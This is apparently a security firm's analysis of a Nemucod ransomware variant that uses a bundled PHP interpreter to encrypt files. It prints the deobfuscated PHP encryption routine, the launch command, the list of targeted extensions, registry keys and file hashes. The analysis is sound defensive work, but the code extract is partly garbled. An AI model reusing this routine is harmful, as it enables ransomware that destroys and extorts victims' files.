Nemucod meets a new buddy: PHP

We have already written about Nemucod downloader when it was paired with 7-Zip, this time we have spotted a new variant in the wild that appears to be a further evolution from previous versions. Before we dig into the analysis part, let’s take a quick look at the most recent history of Nemucod:

  • Mar/2016: Nemucod adds a ransomware routine and begins to encrypt files through a simple XOR encryption, a 255 bytes hardcoded key found inside the downloaded executable. The “header” of each file (2048 bytes) are encrypted;
  • Apr/2016: Next Nemucod downloads a 7-Zip CLI version that is used to build a 7zip archive with a password of 36 bytes in length;
  • Apr/2016: After the 7-Zip variant, Nemucod starts to download a custom executable, again used to encrypt files with xor. This time though the key (36 bytes in length) is dynamically generated by the Javascript and passed as an argument to the executable, in order to perform the encryption of the first 1024 bytes of each targeted file;
  • May/2016: A small change is added to Nemucod that starts again to encrypt 2048 bytes instead of 1024 bytes and the key length is 255 bytes;
  • Today: Nemucod uses a PHP script to accomplish the encryption task.


Similarly to previous versions, Nemucod is spread through spam mails. For this variant a sample email looks like this:


Attached there is a zip with the usual Javascript (MD5: 6597B295B59704DAB0ECB705D291DF09).

Javascript analysis

The Javascript code inside the zip archive is obviously obfuscated. After the deobfuscation we can retrieve the code that looks similar to the one analyzed in our previous analysis. The first immediate difference is the presence of the php word:


The loop downloads 5th file and only the last 3 files are responsible for the encryption process.

PHP Encryption

Nemucod performs 5 HTTP GET requests from inside the for loop:



If we take a look at the end of the deobfuscated code, we can notice that the execution of the 3rd file happens through the ws.Run() command:

ws.Run("%COMSPEC% /c " + fn + ".exe " + cq + fn + ".php" + cq, 0, 1);

that becomes::

ws.Run("cmd.exe /c a.exe "a.php"" , 0, 1);

It’s clear at this point that a.exe file accepts a PHP script. Analyzing the a.exe file we have indeed found evidence that we are dealing with a PHP interpreter.


The executable is actually the official PHP interpreter (ver. 4.4.9) (MD5: 9F13CC0B1B3B03CBEFD8141E5F50B1C1 – a copy can be found here). Taking a look at php.exe dependencies as well as a.exe’s, we can find a DLL called php4ts.dll. This is in fact the 4th file which is downloaded.


So let’s analyze the PHP script (5th file downloaded):



for($i=67;$i<=90;$i++) if(@is_dir(chr($i).':')) Tree(chr($i).':');

function Tree($p)

	if(preg_match('/'.$s.$s.'(winnt|boot|system|windows|tmp|temp|program|appdata|application|roaming|msoffice|temporary|cache)/i',$p) || preg_match('/recycle/i',$p)) return;

	[email protected]($p);

	if($dp===false) return;

	while([email protected]($dp)) if($o!='.'&&$o!='..')
		if (@is_dir($p.$s.$o))
		elseif ($a=='e'&&preg_match('/[.](zip|rar|r00|r01|r02|r03|7z|tar|gz|gzip|arc|arj|bz|bz2|bza|bzip|bzip2|ice|xls|xlsx|doc|docx|pdf|djvu|fb2|rtf|ppt|pptx|pps|sxi|odm|odt|mpp|ssh|pub|gpg|pgp|kdb|kdbx|als|aup|cpr|npr|cpp|bas|asm|cs|php|pas|class|py|pl|h|vb|vcproj|vbproj|java|bak|backup|mdb|accdb|mdf|odb|wdb|csv|tsv|sql|psd|eps|cdr|cpt|indd|dwg|ai|svg|max|skp|scad|cad|3ds|blend|lwo|lws|mb|slddrw|sldasm|sldprt|u3d|jpg|jpeg|tiff|tif|raw|avi|mpg|mp4|m4v|mpeg|mpe|wmf|wmv|veg|mov|3gp|flv|mkv|vob|rm|mp3|wav|asf|wma|m3u|midi|ogg|mid|vdi|vmdk|vhd|dsk|img|iso)$/i',$o) || $a=='d'&&preg_match('/[.](crypted)$/i',$o))
			[email protected]($p.$s.$o,'r+');
			if ($fp!==false)
				[email protected]($fp,1024);

					@rename($p.$s.$o, $p.$s.$o.'.crypted');
					@rename($p.$s.$o, preg_replace('/[.]crypted$/', '', $p.$s.$o));



The PHP code is quite straightforward: a for loop which calls the Tree function, and of course the Tree function body.

The variable $k contains the base64_decode function result of an hardcoded string. After that, the function checks if the path, which is passed as argument to the function itself, contains one of the followings terms:


if a match is found, the function returns, otherwise the scan moves forward. When a suitable folder is found, it is opened, togethers with its subfolders and the files matching the selected extensions are encrypted. The encryption stage XORs the file’s content with one byte of the $k variable. The $k variable length for this sample is 102 bytes.

In this variant the targeted file’s extension, after encryption, is changed to .crypted. The extensions targeted are currently 122:

3ds, 3gp, 7z, accdb, ai, als, arc, arj, asf, asm, aup, avi, backup, bak, bas, blend, bz, bz2, bza, bzip, bzip2, cad, cdr, class, cpp, cpr, cpt, cs, csv, djvu, doc, docx, dsk, dwg, eps, fb2, flv, gpg, gz, gzip, h, ice, img, indd, iso, java, jpeg, jpg, kdb, kdbx, lwo, lws, m3u, m4v, max, mb, mdb, mdf, mid, midi, mkv, mov, mp3, mp4, mpe, mpeg, mpg, mpp, npr, odb, odm, odt, ogg, pas, pdf, pgp, php, pl, pps, ppt, pptx, psd, pub, py, r00, r01, r02, r03, rar, raw, rm, rtf, scad, skp, sldasm, slddrw, sldprt, sql, ssh, svg, sxi, tar, tif, tiff, tsv, u3d, vb, vbproj, vcproj, vdi, veg, vhd, vmdk, vob, wav, wdb, wma, wmf, wmv, xls, xlsx, zip


Compromised Domains

Domain IP Country Code Date RU 2015-12-03 RU 2015-10-28 RU 2015-09-12 RU 2007-10-16 RU 2015-10-18

File System



HKCU\Software\Microsoft\Windows\CurrentVersion\Run\Crypted    “C:\User\PC\AppData\Local\Temp\a.txt”
HKCR\.crypted    “Crypted”
HKCR\Crypted\shell\open\command        “notepad.exe C:\User\PC\AppData\Local\Temp\a.txt”

Dropped files

%TEMP%\a.exe 9F13CC0B1B3B03CBEFD8141E5F50B1C1
%TEMP%\a.php E0765DFBB569ADE9C308198B72FBBA38
%TEMP%\php4ts.dll 106FFA7E8342890798F1AE110F763471
%TEMP%\a1.exe EF6FF0228A1F30935847AE836561112F (not analyzed)
%TEMP%\a2.exe D8C8884B6E816FB924CAE2C648E542C1 (not analyzed)

Payment site

As a ransom Nemucod requires the payment of 0.37070 bitcoins, a bit more than 200€. The decryptor’s download link is made available only after the ransom payment has been verified:


Join our newsletter to get the world’s latest security events and our technical analyses delivered directly to your inbox!